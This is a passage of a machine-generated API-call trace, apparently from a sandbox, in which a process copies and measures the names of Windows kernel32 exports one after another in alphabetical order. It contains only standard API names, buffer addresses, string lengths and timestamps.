lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.362] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.362] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.362] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.362] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.362] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.362] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.362] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.362] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.362] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.362] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.362] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.362] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.362] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.362] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.362] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.363] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.363] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.363] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.363] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.363] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.363] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.363] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.363] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.363] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.363] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.363] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.363] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.363] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.363] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.363] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.363] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.363] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.363] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.364] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.364] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.364] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.364] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.364] lstrlenA (lpString="COPYFILEA") returned 9 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.364] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.364] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.364] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.364] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.364] lstrlenA (lpString="COPYFILEW") returned 9 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.364] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.364] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.364] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.364] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.364] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.364] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.364] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.364] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.365] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.365] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.365] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.365] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.365] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.365] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.365] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.365] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.365] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.365] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.365] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.365] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.365] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.365] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.365] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.365] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.365] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.366] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.366] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.366] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.366] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.366] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.366] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.366] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.366] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.366] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.366] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.366] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.366] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.366] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.366] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.366] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.366] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.367] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.367] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.367] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.367] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.367] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.367] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.367] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.367] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.367] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.367] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.367] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.367] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.367] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.367] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.367] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.367] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.367] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.368] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.368] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.368] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.368] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.368] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.368] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.368] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.368] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.368] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.368] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.368] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.368] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.368] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.368] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.369] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.369] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.369] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.369] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.369] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.369] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.369] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.369] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.369] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.369] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: 